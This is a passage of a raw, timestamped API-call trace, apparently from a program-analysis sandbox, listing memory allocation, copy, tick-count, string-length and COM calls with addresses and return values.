_Src=0x24adf9d475c, _Size=0x4 | out: _Dst=0x24adf9e0028) returned 0x24adf9e0028 [0102.978] malloc (_Size=0x28) returned 0x24ae1411b90 [0102.978] GetTickCount () returned 0x210db92 [0102.978] malloc (_Size=0x28) returned 0x24ae1411b60 [0102.978] GetTickCount () returned 0x210db92 [0102.978] GetTickCount () returned 0x210db92 [0102.978] GetTickCount () returned 0x210db92 [0102.978] memcpy (in: _Dst=0x24adf9dfe48, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9dfe48) returned 0x24adf9dfe48 [0102.978] malloc (_Size=0x28) returned 0x24ae1411aa0 [0102.978] GetTickCount () returned 0x210db92 [0102.978] memcpy (in: _Dst=0x24adf9d3e5c, _Src=0x24adf9dfe48, _Size=0x4 | out: _Dst=0x24adf9d3e5c) returned 0x24adf9d3e5c [0102.978] memcpy (in: _Dst=0x24adf9d3e58, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d3e58) returned 0x24adf9d3e58 [0102.979] free (_Block=0x24ae1411aa0) [0102.979] GetTickCount () returned 0x210db92 [0102.979] memcpy (in: _Dst=0x24adf9dfae8, _Src=0x24adf9d3e5c, _Size=0x4 | out: _Dst=0x24adf9dfae8) returned 0x24adf9dfae8 [0102.979] malloc (_Size=0x28) returned 0x24ae14110e0 [0102.979] GetTickCount () returned 0x210db92 [0102.979] malloc (_Size=0x28) returned 0x24ae14114d0 [0102.979] GetTickCount () returned 0x210db92 [0102.979] GetTickCount () returned 0x210db92 [0102.979] GetTickCount () returned 0x210db92 [0102.979] memcpy (in: _Dst=0x24adf9dfcc8, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9dfcc8) returned 0x24adf9dfcc8 [0102.979] malloc (_Size=0x28) returned 0x24ae1411b00 [0102.979] GetTickCount () returned 0x210db92 [0102.980] memcpy (in: _Dst=0x24adf9d3fac, _Src=0x24adf9dfcc8, _Size=0x4 | out: _Dst=0x24adf9d3fac) returned 0x24adf9d3fac [0102.980] memcpy (in: _Dst=0x24adf9d3fa8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d3fa8) returned 0x24adf9d3fa8 [0102.980] free (_Block=0x24ae1411b00) [0102.980] GetTickCount () returned 0x210db92 [0102.980] memcpy (in: _Dst=0x24adf9e0148, _Src=0x24adf9d3fac, _Size=0x4 | out: _Dst=0x24adf9e0148) returned 0x24adf9e0148 [0102.980] malloc (_Size=0x28) returned 0x24ae1411350 [0102.980] GetTickCount () returned 0x210db92 [0102.980] malloc (_Size=0x28) returned 0x24ae1411380 [0102.981] GetTickCount () returned 0x210db92 [0102.981] GetTickCount () returned 0x210db92 [0102.981] GetTickCount () returned 0x210db92 [0102.981] memcpy (in: _Dst=0x24adf9dfce8, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9dfce8) returned 0x24adf9dfce8 [0102.981] malloc (_Size=0x28) returned 0x24ae1411200 [0102.981] GetTickCount () returned 0x210db92 [0102.981] memcpy (in: _Dst=0x24adf9d3e8c, _Src=0x24adf9dfce8, _Size=0x4 | out: _Dst=0x24adf9d3e8c) returned 0x24adf9d3e8c [0102.981] memcpy (in: _Dst=0x24adf9d3e88, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d3e88) returned 0x24adf9d3e88 [0102.981] free (_Block=0x24ae1411200) [0102.981] GetTickCount () returned 0x210db92 [0102.982] memcpy (in: _Dst=0x24adf9dfee8, _Src=0x24adf9d3e8c, _Size=0x4 | out: _Dst=0x24adf9dfee8) returned 0x24adf9dfee8 [0102.982] malloc (_Size=0x28) returned 0x24ae14116b0 [0102.982] GetTickCount () returned 0x210db92 [0102.982] malloc (_Size=0x28) returned 0x24ae1411200 [0102.982] GetTickCount () returned 0x210db92 [0102.982] GetTickCount () returned 0x210db92 [0102.982] GetTickCount () returned 0x210db92 [0102.982] memcpy (in: _Dst=0x24adf9e0128, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9e0128) returned 0x24adf9e0128 [0102.982] malloc (_Size=0x28) returned 0x24ae14116e0 [0102.982] GetTickCount () returned 0x210db92 [0102.982] memcpy (in: _Dst=0x24adf9d41bc, _Src=0x24adf9e0128, _Size=0x4 | out: _Dst=0x24adf9d41bc) returned 0x24adf9d41bc [0102.982] memcpy (in: _Dst=0x24adf9d41b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9d41b8) returned 0x24adf9d41b8 [0102.983] free (_Block=0x24ae14116e0) [0102.983] GetTickCount () returned 0x210db92 [0102.983] memcpy (in: _Dst=0x24adf9dfb08, _Src=0x24adf9d41bc, _Size=0x4 | out: _Dst=0x24adf9dfb08) returned 0x24adf9dfb08 [0102.983] malloc (_Size=0x28) returned 0x24ae1411920 [0102.983] GetTickCount () returned 0x210db92 [0102.983] malloc (_Size=0x28) returned 0x24ae1411710 [0102.983] GetTickCount () returned 0x210db92 [0102.983] GetTickCount () returned 0x210db92 [0102.984] memcpy (in: _Dst=0x24adf9cabd8, _Src=0x24adf9dfb08, _Size=0x4 | out: _Dst=0x24adf9cabd8) returned 0x24adf9cabd8 [0102.984] memcpy (in: _Dst=0x24adf9cabd6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9cabd6) returned 0x24adf9cabd6 [0102.984] memcpy (in: _Dst=0x24adf9cabd2, _Src=0x24adf9dfee8, _Size=0x4 | out: _Dst=0x24adf9cabd2) returned 0x24adf9cabd2 [0102.984] memcpy (in: _Dst=0x24adf9cabd0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9cabd0) returned 0x24adf9cabd0 [0102.984] memcpy (in: _Dst=0x24adf9cabcc, _Src=0x24adf9e0148, _Size=0x4 | out: _Dst=0x24adf9cabcc) returned 0x24adf9cabcc [0102.984] memcpy (in: _Dst=0x24adf9cabca, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9cabca) returned 0x24adf9cabca [0102.984] memcpy (in: _Dst=0x24adf9cabc6, _Src=0x24adf9dfae8, _Size=0x4 | out: _Dst=0x24adf9cabc6) returned 0x24adf9cabc6 [0102.984] memcpy (in: _Dst=0x24adf9cabc4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9cabc4) returned 0x24adf9cabc4 [0102.984] memcpy (in: _Dst=0x24adf9cabc0, _Src=0x24adf9e0028, _Size=0x4 | out: _Dst=0x24adf9cabc0) returned 0x24adf9cabc0 [0102.984] memcpy (in: _Dst=0x24adf9cabbe, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9cabbe) returned 0x24adf9cabbe [0102.984] memcpy (in: _Dst=0x24adf9cabba, _Src=0x24adf9dfde8, _Size=0x4 | out: _Dst=0x24adf9cabba) returned 0x24adf9cabba [0102.984] memcpy (in: _Dst=0x24adf9cabb8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9cabb8) returned 0x24adf9cabb8 [0102.984] free (_Block=0x24ae1411710) [0102.985] SysStringLen (param_1="%c3%ac%c3%aa%60%39") returned 0x12 [0102.985] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13aeb70 [0102.985] memcpy (in: _Dst=0x24adf9d46c8, _Src=0x24ae13aeb70, _Size=0x8 | out: _Dst=0x24adf9d46c8) returned 0x24adf9d46c8 [0102.985] free (_Block=0x24ae13aeb70) [0102.985] malloc (_Size=0x2e0) returned 0x24ae140c3e0 [0102.985] malloc (_Size=0x20) returned 0x24ae1411bc0 [0102.985] malloc (_Size=0x288) returned 0x24ae13c7060 [0102.986] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139c9a0 [0102.986] realloc (_Block=0x24ae1411bc0, _Size=0x40) returned 0x24ae13949e0 [0102.986] realloc (_Block=0x24ae139c9a0, _Size=0x280) returned 0x24ae1419ec0 [0102.986] malloc (_Size=0x508) returned 0x24ae1488860 [0102.986] realloc (_Block=0x24ae13949e0, _Size=0x80) returned 0x24ae1482450 [0102.986] realloc (_Block=0x24ae1419ec0, _Size=0x500) returned 0x24ae1488d70 [0102.986] malloc (_Size=0xa08) returned 0x24ae13b51d0 [0102.986] realloc (_Block=0x24ae1482450, _Size=0x100) returned 0x24ae1474cc0 [0102.986] realloc (_Block=0x24ae1488d70, _Size=0xa00) returned 0x24ae13b3db0 [0102.986] malloc (_Size=0x1408) returned 0x24ae1401530 [0102.989] realloc (_Block=0x24ae1474cc0, _Size=0x200) returned 0x24ae1416180 [0102.989] realloc (_Block=0x24ae13b3db0, _Size=0x1400) returned 0x24ae13f88c0 [0102.989] malloc (_Size=0x2808) returned 0x24ae18b7a40 [0102.990] malloc (_Size=0x28) returned 0x24ae1411aa0 [0102.990] GetTickCount () returned 0x210dba2 [0102.991] malloc (_Size=0x28) returned 0x24ae1411980 [0102.991] GetTickCount () returned 0x210dba2 [0102.991] GetTickCount () returned 0x210dba2 [0102.991] malloc (_Size=0x28) returned 0x24ae1411620 [0102.991] GetTickCount () returned 0x210dba2 [0102.991] malloc (_Size=0x28) returned 0x24ae1411230 [0102.991] GetTickCount () returned 0x210dba2 [0102.991] GetTickCount () returned 0x210dba2 [0102.992] malloc (_Size=0x28) returned 0x24ae1411860 [0102.992] GetTickCount () returned 0x210dba2 [0102.992] memcpy (in: _Dst=0x24adf9ad868, _Src=0x24ae1a01b1c, _Size=0x2 | out: _Dst=0x24adf9ad868) returned 0x24adf9ad868 [0102.992] memcpy (in: _Dst=0x24adf9ad866, _Src=0x24adf9dfd48, _Size=0x2 | out: _Dst=0x24adf9ad866) returned 0x24adf9ad866 [0102.992] memcpy (in: _Dst=0x24adf9ad864, _Src=0x24adf9dff48, _Size=0x2 | out: _Dst=0x24adf9ad864) returned 0x24adf9ad864 [0102.992] memcpy (in: _Dst=0x24adf9ad862, _Src=0x24adf9dfba8, _Size=0x2 | out: _Dst=0x24adf9ad862) returned 0x24adf9ad862 [0102.992] memcpy (in: _Dst=0x24adf9ad860, _Src=0x24adf9dfe68, _Size=0x2 | out: _Dst=0x24adf9ad860) returned 0x24adf9ad860 [0102.992] memcpy (in: _Dst=0x24adf9ad85e, _Src=0x24adf9dff88, _Size=0x2 | out: _Dst=0x24adf9ad85e) returned 0x24adf9ad85e [0102.993] free (_Block=0x24ae1411860) [0102.993] malloc (_Size=0x70) returned 0x24ae141c2e0 [0102.993] malloc (_Size=0xa8) returned 0x24ae1894f30 [0102.993] malloc (_Size=0x80) returned 0x24ae14824e0 [0102.993] malloc (_Size=0x108) returned 0x24ae1474cc0 [0102.993] malloc (_Size=0x208) returned 0x24ae1417200 [0102.993] malloc (_Size=0xd8) returned 0x24ae140b170 [0102.993] malloc (_Size=0x18) returned 0x24ae145c760 [0102.993] GetTickCount () returned 0x210dba2 [0102.993] malloc (_Size=0xd8) returned 0x24ae140b250 [0102.993] malloc (_Size=0x18) returned 0x24ae1896140 [0102.994] GetTickCount () returned 0x210dba2 [0102.994] malloc (_Size=0xd8) returned 0x24ae140a0d0 [0102.994] malloc (_Size=0x18) returned 0x24ae1895ea0 [0102.994] GetTickCount () returned 0x210dba2 [0102.994] malloc (_Size=0xd8) returned 0x24ae140b6b0 [0102.994] malloc (_Size=0x18) returned 0x24ae18960e0 [0102.994] GetTickCount () returned 0x210dba2 [0102.994] GetTickCount () returned 0x210dba2 [0102.994] GetTickCount () returned 0x210dba2 [0102.994] GetTickCount () returned 0x210dba2 [0102.994] GetTickCount () returned 0x210dba2 [0102.995] malloc (_Size=0x28) returned 0x24ae1411890 [0102.995] GetTickCount () returned 0x210dba2 [0102.995] free (_Block=0x24ae1411890) [0102.995] malloc (_Size=0x28) returned 0x24ae14113e0 [0102.996] GetTickCount () returned 0x210dba2 [0102.996] GetTickCount () returned 0x210dba2 [0102.996] free (_Block=0x24ae14113e0) [0102.996] free (_Block=0x24ae1891240) [0102.997] malloc (_Size=0x70) returned 0x24ae141c360 [0102.997] GetTickCount () returned 0x210dba2 [0102.997] GetTickCount () returned 0x210dba2 [0102.997] malloc (_Size=0x2e0) returned 0x24ae140d290 [0102.998] malloc (_Size=0x20) returned 0x24ae1411ad0 [0102.998] malloc (_Size=0x288) returned 0x24ae1417d70 [0102.998] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139cee0 [0102.998] GetTickCount () returned 0x210dba2 [0102.998] malloc (_Size=0x28) returned 0x24ae1411b00 [0102.998] GetTickCount () returned 0x210dba2 [0102.998] GetTickCount () returned 0x210dba2 [0102.999] free (_Block=0x24ae1411b00) [0102.999] malloc (_Size=0x28) returned 0x24ae1411560 [0102.999] GetTickCount () returned 0x210dba2 [0103.000] free (_Block=0x24ae1411560) [0103.000] malloc (_Size=0x28) returned 0x24ae1411080 [0103.000] GetTickCount () returned 0x210dba2 [0103.001] free (_Block=0x24ae1411080) [0103.001] malloc (_Size=0x80) returned 0x24ae1482570 [0103.001] malloc (_Size=0x108) returned 0x24ae1474dd0 [0103.001] malloc (_Size=0x28) returned 0x24ae14116e0 [0103.001] GetTickCount () returned 0x210dba2 [0103.002] free (_Block=0x24ae14116e0) [0103.002] malloc (_Size=0x18) returned 0x24ae1895f40 [0103.002] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13af1f0 [0103.002] free (_Block=0x24ae13af1f0) [0103.003] free (_Block=0x24ae1895f40) [0103.003] malloc (_Size=0x28) returned 0x24ae1411260 [0103.003] GetTickCount () returned 0x210dbb2 [0103.004] free (_Block=0x24ae1411260) [0103.005] malloc (_Size=0x70) returned 0x24ae141c9e0 [0103.005] GetTickCount () returned 0x210dbb2 [0103.005] GetTickCount () returned 0x210dbb2 [0103.005] malloc (_Size=0x28) returned 0x24ae1411770 [0103.005] GetTickCount () returned 0x210dbb2 [0103.006] malloc (_Size=0x28) returned 0x24ae14116e0 [0103.006] GetTickCount () returned 0x210dbb2 [0103.006] malloc (_Size=0x28) returned 0x24ae14117d0 [0103.006] GetTickCount () returned 0x210dbb2 [0103.006] GetTickCount () returned 0x210dbb2 [0103.006] malloc (_Size=0x28) returned 0x24ae1411b00 [0103.006] GetTickCount () returned 0x210dbb2 [0103.007] malloc (_Size=0x28) returned 0x24ae1411710 [0103.007] GetTickCount () returned 0x210dbb2 [0103.007] malloc (_Size=0x28) returned 0x24ae1411bc0 [0103.007] GetTickCount () returned 0x210dbb2 [0103.007] free (_Block=0x24ae1411bc0) [0103.007] GetTickCount () returned 0x210dbb2 [0103.007] GetTickCount () returned 0x210dbb2 [0103.008] malloc (_Size=0x28) returned 0x24ae1411500 [0103.008] GetTickCount () returned 0x210dbb2 [0103.008] free (_Block=0x24ae1411500) [0103.008] GetTickCount () returned 0x210dbb2 [0103.008] malloc (_Size=0x28) returned 0x24ae1411740 [0103.008] GetTickCount () returned 0x210dbb2 [0103.008] GetTickCount () returned 0x210dbb2 [0103.008] GetTickCount () returned 0x210dbb2 [0103.009] malloc (_Size=0x28) returned 0x24ae14117a0 [0103.009] GetTickCount () returned 0x210dbb2 [0103.009] free (_Block=0x24ae14117a0) [0103.009] GetTickCount () returned 0x210dbb2 [0103.009] malloc (_Size=0x28) returned 0x24ae1411bc0 [0103.010] GetTickCount () returned 0x210dbb2 [0103.010] malloc (_Size=0x28) returned 0x24ae1411800 [0103.010] GetTickCount () returned 0x210dbb2 [0103.010] GetTickCount () returned 0x210dbb2 [0103.010] GetTickCount () returned 0x210dbb2 [0103.010] malloc (_Size=0x28) returned 0x24ae1411500 [0103.010] GetTickCount () returned 0x210dbb2 [0103.011] free (_Block=0x24ae1411500) [0103.011] GetTickCount () returned 0x210dbb2 [0103.011] malloc (_Size=0x28) returned 0x24ae1411290 [0103.011] GetTickCount () returned 0x210dbb2 [0103.011] malloc (_Size=0x28) returned 0x24ae14118c0 [0103.011] GetTickCount () returned 0x210dbb2 [0103.011] GetTickCount () returned 0x210dbb2 [0103.011] GetTickCount () returned 0x210dbb2 [0103.011] malloc (_Size=0x28) returned 0x24ae1411c20 [0103.011] GetTickCount () returned 0x210dbb2 [0103.012] free (_Block=0x24ae1411c20) [0103.012] GetTickCount () returned 0x210dbb2 [0103.012] malloc (_Size=0x28) returned 0x24ae1411320 [0103.012] GetTickCount () returned 0x210dbb2 [0103.012] malloc (_Size=0x28) returned 0x24ae1411140 [0103.012] GetTickCount () returned 0x210dbb2 [0103.012] GetTickCount () returned 0x210dbb2 [0103.012] GetTickCount () returned 0x210dbb2 [0103.012] malloc (_Size=0x28) returned 0x24ae1411830 [0103.013] GetTickCount () returned 0x210dbb2 [0103.013] free (_Block=0x24ae1411830) [0103.013] GetTickCount () returned 0x210dbb2 [0103.013] malloc (_Size=0x28) returned 0x24ae14117a0 [0103.013] GetTickCount () returned 0x210dbb2 [0103.013] malloc (_Size=0x28) returned 0x24ae14115c0 [0103.013] GetTickCount () returned 0x210dbb2 [0103.013] GetTickCount () returned 0x210dbb2 [0103.014] GetTickCount () returned 0x210dbb2 [0103.014] malloc (_Size=0x28) returned 0x24ae14112c0 [0103.014] GetTickCount () returned 0x210dbb2 [0103.014] free (_Block=0x24ae14112c0) [0103.014] GetTickCount () returned 0x210dbb2 [0103.015] malloc (_Size=0x28) returned 0x24ae14115f0 [0103.015] malloc (_Size=0x28) returned 0x24ae1411410 [0103.015] malloc (_Size=0x28) returned 0x24ae1411260 [0103.016] free (_Block=0x24ae1411260) [0103.016] malloc (_Size=0x28) returned 0x24ae1411650 [0103.016] malloc (_Size=0x28) returned 0x24ae1411c20 [0103.017] free (_Block=0x24ae1411c20) [0103.017] SysStringLen (param_1="%4c%c2%aa%c2%b8%c3%81") returned 0x15 [0103.017] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae690 [0103.018] free (_Block=0x24ae13ae690) [0103.020] malloc (_Size=0x2e0) returned 0x24ae140d870 [0103.021] malloc (_Size=0x20) returned 0x24ae1411260 [0103.021] malloc (_Size=0x288) returned 0x24ae1418000 [0103.021] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139c700 [0103.021] realloc (_Block=0x24ae1411260, _Size=0x40) returned 0x24ae1394800 [0103.021] realloc (_Block=0x24ae139c700, _Size=0x280) returned 0x24ae141ae20 [0103.021] malloc (_Size=0x508) returned 0x24ae1488d70 [0103.022] realloc (_Block=0x24ae1394800, _Size=0x80) returned 0x24ae1482600 [0103.022] realloc (_Block=0x24ae141ae20, _Size=0x500) returned 0x24ae1487930 [0103.022] malloc (_Size=0xa08) returned 0x24ae13b3db0 [0103.022] realloc (_Block=0x24ae1482600, _Size=0x100) returned 0x24ae1474ee0 [0103.022] realloc (_Block=0x24ae1487930, _Size=0xa00) returned 0x24ae13af740 [0103.022] malloc (_Size=0x1408) returned 0x24ae1407980 [0103.022] realloc (_Block=0x24ae1474ee0, _Size=0x200) returned 0x24ae1413e70 [0103.023] realloc (_Block=0x24ae13af740, _Size=0x1400) returned 0x24ae1402940 [0103.023] malloc (_Size=0x2808) returned 0x24ae18bca60 [0103.024] malloc (_Size=0x28) returned 0x24ae1411c20 [0103.024] malloc (_Size=0x28) returned 0x24ae1411860 [0103.025] malloc (_Size=0x28) returned 0x24ae1411830 [0103.025] malloc (_Size=0x28) returned 0x24ae1411890 [0103.026] free (_Block=0x24ae1411890) [0103.026] malloc (_Size=0x28) returned 0x24ae1411050 [0103.026] malloc (_Size=0x28) returned 0x24ae1411a40 [0103.028] free (_Block=0x24ae1411a40) [0103.028] malloc (_Size=0x28) returned 0x24ae14113b0 [0103.028] malloc (_Size=0x28) returned 0x24ae1411260 [0103.029] free (_Block=0x24ae1411260) [0103.030] malloc (_Size=0x70) returned 0x24ae141d2e0 [0103.031] malloc (_Size=0x28) returned 0x24ae1411260 [0103.031] malloc (_Size=0x28) returned 0x24ae14112c0 [0103.032] malloc (_Size=0x28) returned 0x24ae14119b0 [0103.033] malloc (_Size=0x28) returned 0x24ae1411080 [0103.033] malloc (_Size=0x28) returned 0x24ae1411890 [0103.040] malloc (_Size=0x28) returned 0x24ae14112f0 [0103.041] free (_Block=0x24ae14112f0) [0103.041] GetTickCount () returned 0x210dbd1 [0103.041] GetTickCount () returned 0x210dbd1 [0103.041] malloc (_Size=0x28) returned 0x24ae14112f0 [0103.042] free (_Block=0x24ae14112f0) [0103.042] malloc (_Size=0x28) returned 0x24ae14113e0 [0103.042] malloc (_Size=0x28) returned 0x24ae1411a10 [0103.043] free (_Block=0x24ae1411a10) [0103.044] malloc (_Size=0x28) returned 0x24ae14112f0 [0103.044] malloc (_Size=0x28) returned 0x24ae1411a10 [0103.044] malloc (_Size=0x28) returned 0x24ae1411500 [0103.045] free (_Block=0x24ae1411500) [0103.045] malloc (_Size=0x28) returned 0x24ae1411500 [0103.045] malloc (_Size=0x28) returned 0x24ae1411530 [0103.045] malloc (_Size=0x28) returned 0x24ae1411560 [0103.046] free (_Block=0x24ae1411560) [0103.046] malloc (_Size=0x28) returned 0x24ae1411560 [0103.046] malloc (_Size=0x28) returned 0x24ae1411a40 [0103.046] malloc (_Size=0x28) returned 0x24ae18928c0 [0103.047] free (_Block=0x24ae18928c0) [0103.047] malloc (_Size=0x28) returned 0x24ae1891f00 [0103.047] malloc (_Size=0x28) returned 0x24ae18928c0 [0103.047] malloc (_Size=0x28) returned 0x24ae18920b0 [0103.048] free (_Block=0x24ae18920b0) [0103.048] malloc (_Size=0x28) returned 0x24ae1892440 [0103.048] malloc (_Size=0x28) returned 0x24ae1891db0 [0103.048] malloc (_Size=0x28) returned 0x24ae18922f0 [0103.048] free (_Block=0x24ae18922f0) [0103.048] malloc (_Size=0x28) returned 0x24ae1891ea0 [0103.048] malloc (_Size=0x28) returned 0x24ae1892470 [0103.049] free (_Block=0x24ae1892470) [0103.049] SysStringLen (param_1="%c3%af%c2%a1%36%c2%a7") returned 0x15 [0103.049] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae4f0 [0103.049] free (_Block=0x24ae13ae4f0) [0103.063] malloc (_Size=0x2e0) returned 0x24ae140e140 [0103.064] malloc (_Size=0x20) returned 0x24ae1892230 [0103.064] malloc (_Size=0x288) returned 0x24ae1418290 [0103.064] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139c9a0 [0103.064] realloc (_Block=0x24ae1892230, _Size=0x40) returned 0x24ae1394c10 [0103.064] realloc (_Block=0x24ae139c9a0, _Size=0x280) returned 0x24ae1419ec0 [0103.064] malloc (_Size=0x508) returned 0x24ae1487930 [0103.064] realloc (_Block=0x24ae1394c10, _Size=0x80) returned 0x24ae1482180 [0103.064] realloc (_Block=0x24ae1419ec0, _Size=0x500) returned 0x24ae141e290 [0103.064] malloc (_Size=0xa08) returned 0x24ae13af740 [0103.064] realloc (_Block=0x24ae1482180, _Size=0x100) returned 0x24ae1474ee0 [0103.065] realloc (_Block=0x24ae141e290, _Size=0xa00) returned 0x24ae1429ef0 [0103.065] malloc (_Size=0x1408) returned 0x24ae1403d50 [0103.065] realloc (_Block=0x24ae1474ee0, _Size=0x200) returned 0x24ae1415b50 [0103.065] realloc (_Block=0x24ae1429ef0, _Size=0x1400) returned 0x24ae1405160 [0103.065] malloc (_Size=0x2808) returned 0x24ae18bf270 [0103.066] malloc (_Size=0x28) returned 0x24ae1892470 [0103.066] malloc (_Size=0x28) returned 0x24ae1891f60 [0103.066] malloc (_Size=0x28) returned 0x24ae18920b0 [0103.066] malloc (_Size=0x28) returned 0x24ae1892230 [0103.066] malloc (_Size=0x28) returned 0x24ae18924d0 [0103.067] free (_Block=0x24ae18924d0) [0103.067] malloc (_Size=0x28) returned 0x24ae18924d0 [0103.067] malloc (_Size=0x28) returned 0x24ae18922f0 [0103.068] free (_Block=0x24ae18922f0) [0103.068] malloc (_Size=0x70) returned 0x24ae141c7e0 [0103.068] malloc (_Size=0x28) returned 0x24ae18922f0 [0103.068] malloc (_Size=0x28) returned 0x24ae1893490 [0103.069] malloc (_Size=0x28) returned 0x24ae1892da0 [0103.069] malloc (_Size=0x28) returned 0x24ae1892fb0 [0103.069] malloc (_Size=0x28) returned 0x24ae18932b0 [0103.069] free (_Block=0x24ae18932b0) [0103.069] GetTickCount () returned 0x210dbf0 [0103.069] GetTickCount () returned 0x210dbf0 [0103.070] malloc (_Size=0x28) returned 0x24ae18932b0 [0103.070] free (_Block=0x24ae18932b0) [0103.070] malloc (_Size=0x28) returned 0x24ae18932b0 [0103.070] malloc (_Size=0x28) returned 0x24ae1893310 [0103.071] free (_Block=0x24ae1893310) [0103.071] malloc (_Size=0x28) returned 0x24ae1893310 [0103.071] malloc (_Size=0x28) returned 0x24ae1893640 [0103.071] malloc (_Size=0x28) returned 0x24ae18936a0 [0103.071] free (_Block=0x24ae18936a0) [0103.072] malloc (_Size=0x28) returned 0x24ae18936a0 [0103.072] SysStringLen (param_1="%c2%8d%c2%83%05%49") returned 0x12 [0103.073] SysStringLen (param_1="%70%c3%80%c3%80%c2%97") returned 0x15 [0103.074] SysStringLen (param_1="%15%3d%c3%89%62") returned 0xf [0103.075] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0103.076] free (_Block=0x24ae1484a20) [0103.076] free (_Block=0x24ae189ab60) [0103.076] free (_Block=0x24ae189aa40) [0103.076] free (_Block=0x24ae189ac80) [0103.076] free (_Block=0x24ae139dbe0) [0103.077] free (_Block=0x24ae13b7ae0) [0103.078] free (_Block=0x24ae148a200) [0103.078] free (_Block=0x24ae1489d80) [0103.078] free (_Block=0x24ae148a140) [0103.078] free (_Block=0x24ae148a1d0) [0103.078] free (_Block=0x24ae148a260) [0103.079] free (_Block=0x24ae139b6f0) [0103.079] free (_Block=0x24ae139b000) [0103.079] free (_Block=0x24ae139b1e0) [0103.079] free (_Block=0x24ae139af40) [0103.079] free (_Block=0x24ae139b2a0) [0103.080] free (_Block=0x24ae139f830) [0103.081] free (_Block=0x24ae13a0940) [0103.081] free (_Block=0x24ae13a0880) [0103.082] free (_Block=0x24ae13a0d90) [0103.082] free (_Block=0x24ae188e090) [0103.082] free (_Block=0x24ae188e690) [0103.082] free (_Block=0x24ae188e570) [0103.082] free (_Block=0x24ae188fa40) [0103.082] free (_Block=0x24ae188f560) [0103.082] free (_Block=0x24ae188f920) [0103.082] free (_Block=0x24ae188f8f0) [0103.083] free (_Block=0x24ae188fc80) [0103.083] free (_Block=0x24ae188fc20) [0103.083] free (_Block=0x24ae188ed20) [0103.083] free (_Block=0x24ae188ecf0) [0103.083] free (_Block=0x24ae18902e0) [0103.083] free (_Block=0x24ae18901f0) [0103.085] free (_Block=0x24ae188fec0) [0103.085] free (_Block=0x24ae1890610) [0103.085] free (_Block=0x24ae18912a0) [0103.085] free (_Block=0x24ae1890f40) [0103.085] free (_Block=0x24ae1890e20) [0103.085] free (_Block=0x24ae1891240) [0103.085] free (_Block=0x24ae1893970) [0103.086] free (_Block=0x24ae18936a0) [0103.087] free (_Block=0x24ae1893640) [0103.087] free (_Block=0x24ae1893310) [0103.087] free (_Block=0x24ae18932b0) [0103.088] free (_Block=0x24ae1892fb0) [0103.088] free (_Block=0x24ae1892da0) [0103.089] free (_Block=0x24ae1893490) [0103.089] free (_Block=0x24ae18922f0) [0103.090] free (_Block=0x24ae18924d0) [0103.091] free (_Block=0x24ae1892230) [0103.091] free (_Block=0x24ae1891ea0) [0103.092] free (_Block=0x24ae1891db0) [0103.092] free (_Block=0x24ae1892440) [0103.092] free (_Block=0x24ae18928c0) [0103.093] free (_Block=0x24ae1891f00) [0103.093] free (_Block=0x24ae1411a40) [0103.094] free (_Block=0x24ae1411560) [0103.094] free (_Block=0x24ae1411530) [0103.094] free (_Block=0x24ae1411500) [0103.095] free (_Block=0x24ae1411a10) [0103.095] free (_Block=0x24ae14112f0) [0103.096] free (_Block=0x24ae14113e0) [0103.097] free (_Block=0x24ae1411890) [0103.098] free (_Block=0x24ae1411080) [0103.099] free (_Block=0x24ae14119b0) [0103.100] free (_Block=0x24ae14112c0) [0103.102] free (_Block=0x24ae1411260) [0103.103] free (_Block=0x24ae14113b0) [0103.104] free (_Block=0x24ae1411050) [0103.104] free (_Block=0x24ae1411650) [0103.105] free (_Block=0x24ae1411410) [0103.105] free (_Block=0x24ae14115f0) [0103.105] free (_Block=0x24ae14115c0) [0103.106] free (_Block=0x24ae14117a0) [0103.107] free (_Block=0x24ae1411140) [0103.108] free (_Block=0x24ae1411320) [0103.109] free (_Block=0x24ae14118c0) [0103.110] free (_Block=0x24ae1411290) [0103.111] free (_Block=0x24ae1411800) [0103.112] free (_Block=0x24ae1411bc0) [0103.113] free (_Block=0x24ae1411740) [0103.114] free (_Block=0x24ae1411710) [0103.114] free (_Block=0x24ae1411b00) [0103.115] free (_Block=0x24ae14117d0) [0103.115] free (_Block=0x24ae14116e0) [0103.116] free (_Block=0x24ae1411770) [0103.117] MulDiv (nNumber=1988, nNumerator=100, nDenominator=7546) returned 26 [0103.117] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0103.117] GetTickCount () returned 0x210dc1f [0103.117] SysStringLen (param_1="%c2%ab%74%c3%b4%c2%b4") returned 0x15 [0103.118] SysStringLen (param_1="%c3%9c%31%72%c2%b5") returned 0x12 [0103.120] SysStringLen (param_1="%c2%b2%c3%b6%79%5c") returned 0x12 [0103.121] SysStringLen (param_1="%28%c3%8e%3e%c3%9a") returned 0x12 [0103.122] SysStringLen (param_1="%63%74%69%76") returned 0xc [0103.122] SysStringLen (param_1="%c2%b5%50%4e%02") returned 0xf [0103.123] SysStringLen (param_1="%17%c2%8e%16%2a") returned 0xf [0103.124] SysStringLen 